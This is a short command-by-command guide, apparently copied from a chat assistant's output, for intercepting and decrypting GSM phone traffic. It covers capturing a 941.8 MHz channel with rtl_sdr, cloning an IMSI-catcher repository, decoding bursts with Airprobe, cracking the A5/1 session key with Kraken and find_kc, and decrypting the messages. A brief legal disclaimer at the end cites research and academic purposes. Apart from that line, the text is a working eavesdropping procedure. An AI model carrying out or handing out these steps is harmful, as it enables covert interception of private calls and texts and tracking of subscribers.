Shri - Guid.iot - DECRYPT
Shri - Guid.iot - DECRYPT
1. Set Up Environment:
o Install a Linux distribution (e.g., Ubuntu).
o Ensure required tools are installed:
Wireshark
Airprobe
Kraken
Python (for scripts like xor.py)
2. Install Dependencies:
o Update the system and install necessary libraries:
bash
Copy code
sudo apt update && sudo apt upgrade
sudo apt install wireshark python3 git build-essential
o Clone repositories:
bash
Copy code
git clone https://github.com/airprobe/airprobe.git
git clone https://github.com/Oros42/IMSI-catcher.git
3. Prepare Tools:
o Navigate to each tool's directory and follow setup instructions (e.g., make
commands for building binaries).
bash
Copy code
rtl_sdr -f 941.8M -s 1.0M capture_941.8M_112.cfile
bash
Copy code
sudo wireshark -k -Y '!icmp && gsmtap' -i lo
1. Airprobe Decoding:
o Decode the captured .cfile using Airprobe:
bash
Copy code
cd /home/username/airprobe/gsm-receiver/src/python
sudo ./go.sh capture_941.8M_112.cfile 112 0B
bash
Copy code
sudo ./go.sh capture_941.8M_112.cfile 112 1S &> bursts.txt
2. Review Output:
o Open bursts.txt or other output files to examine decoded data.
1. XOR Utility:
o Use the xor.py script for key analysis or decryption preparation:
bash
Copy code
cd /home/username/kraken/Utilities/
./xor.py <binary_string_1> <binary_string_2>
bash
Copy code
cd /home/username/kraken/Kraken
sudo ./kraken ../indexes/
o Perform cracking:
bash
Copy code
crack <intercepted_binary_data>
bash
Copy code
cd /home/username/kraken/Utilities/
./find_kc <input_params>
Decrypt GSM Messages
bash
Copy code
sudo ./go.sh capture_941.8M_112.cfile 112 1S <KC_KEY>
Final Steps
GSM signal interception and decryption are regulated by laws in most jurisdictions.
Unauthorized interception of communication is illegal and punishable under privacy laws.
Use this guide solely for ethical purposes like:
Security research.
Testing network vulnerabilities with permission.
Academic purposes.